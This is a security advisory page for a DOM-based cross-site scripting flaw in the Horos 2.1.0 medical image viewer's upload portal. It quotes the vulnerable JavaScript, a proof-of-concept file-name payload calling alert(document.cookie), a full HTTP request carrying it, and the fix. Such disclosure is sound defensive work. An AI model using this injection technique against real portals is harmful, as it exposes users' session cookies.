what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Horos 2.1.0 Cross Site Scripting

Horos 2.1.0 Cross Site Scripting
Posted Dec 16, 2016
Authored by LiquidWorm | Site zeroscience.mk

Horos version 2.1.0 suffers from a cross site scripting vulnerability.

tags | exploit, xss
SHA-256 | c7d90c0d7ae5ab140e712c754c80c93be75248e57cb288a655e9b2ca4edaf000

Horos 2.1.0 Cross Site Scripting

Change Mirror Download

Horos 2.1.0 Web Portal DOM Based XSS


Vendor: Horos Project
Product web page: https://www.horosproject.org
Affected version: 2.1.0

Summary: HorosaC/ is an open-source, free medical image viewer. The goal of the
Horos Project is to develop a fully functional, 64-bit medical image viewer for
OS X. Horos is based upon OsiriX and other open source medical imaging libraries.

Desc: Horos suffers from a DOM-based XSS vulnerability because it doesn't use proper sanitization
when user input goes to a dangerous HTML modification sink ((element).innerHTML). This can be
exploited to execute arbitrary HTML and script code in a user's browser DOM in context of an
affected site.

Tested on: macOS 12.10.2 (Sierra)


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience


Advisory ID: ZSL-2016-5385
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5385.php


15.12.2016

--


------vuln-----

function fileSelected() {
var file = document.getElementById('fileToUpload').files[0];
if (file) {
var fileSize = 0;
if (file.size > 1024 * 1024)
fileSize = (Math.round(file.size * 100 / (1024 * 1024)) / 100).toString() + 'MB';
else
fileSize = (Math.round(file.size * 100 / 1024) / 100).toString() + 'KB';

document.getElementById('fileName').innerHTML = 'Name: ' + file.name; // xss
document.getElementById('fileSize').innerHTML = 'Size: ' + fileSize;
document.getElementById('fileType').innerHTML = 'Type: ' + file.type;
}
}

function uploadFile()
{
document.getElementById('progressbar').innerHTML = '0%';
document.getElementById("progressbar").style.width = '0%';
document.getElementById("progressbar").className = "progress-bar progress-bar-striped";
document.getElementById("upload_button").className = "btn btn-default disabled";

setTimeout(function(){

var fd = new FormData();
fd.append("fileToUpload", document.getElementById('fileToUpload').files[0]);
var xhr = new XMLHttpRequest();
xhr.upload.addEventListener("progress", uploadProgress, false);
xhr.addEventListener("load", uploadComplete, false);
xhr.addEventListener("error", uploadFailed, false);
xhr.addEventListener("abort", uploadCanceled, false);
xhr.open("POST", "", true);
xhr.send(fd);

}, 500);
}

...

<form class="col-md-12" id="form1" action="javascript:void(0);" method="post" enctype="multipart/form-data">
<div class="form-group col-md-12">
<label for="fileToUpload">File input</label>
<input type="file" name="file" id="fileToUpload" onchange="fileSelected();">
<div class="help-block">
<div id="fileName"></div> // xss
<div id="fileSize"></div>
<div id="fileType"></div>
</div>
</div>
<div class="col-lg-2 col-md-3">
<button type="submit" class="btn btn-default" id="upload_button" name="upload_button" onclick="uploadFile()" value="Upload">Upload</button>
</div>
<div class="col-lg-10 col-md-9 help-block">
<div class="progress" id="progressbar_containter" style="display: none;">
<div class="progress-bar progress-bar-striped" id="progressbar" role="progressbar" aria-valuenow="2" aria-valuemin="0" aria-valuemax="100" style="min-width: 2em;"></div>
</div>
</div>
</form>


------/vuln-----

Element output: <div id="fileName">Name: <img src="#" onerror="alert(document.cookie)" :="">.mp3</div>
Fix: (element).innerText or (element).textContent

PoC payload: <img src="#" onerror="alert(document.cookie")/>:


POST /main HTTP/1.1
Host: 127.0.0.1:3333
Content-Length: 3
Origin: http://127.0.0.1:3333
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBUg5yXYbUF1w5AEi
Accept: */*
Referer: http://127.0.0.1:3333/main
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.8
Cookie: OSID=53B11D55703E7A7DA14AF867B2C7E346
DNT: 1
Connection: close

------WebKitFormBoundaryBUg5yXYbUF1w5AEi
Content-Disposition: form-data; name="fileToUpload"; filename="<img src=%22#%22 onerror=%22alert(document.cookie)%22:>.mp3"
Content-Type: audio/mp3

ZSL
------WebKitFormBoundaryBUg5yXYbUF1w5AEi--

Login or Register to add favorites

File Archive:

October 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    39 Files
  • 2
    Oct 2nd
    23 Files
  • 3
    Oct 3rd
    18 Files
  • 4
    Oct 4th
    20 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    0 Files
  • 8
    Oct 8th
    0 Files
  • 9
    Oct 9th
    0 Files
  • 10
    Oct 10th
    0 Files
  • 11
    Oct 11th
    0 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close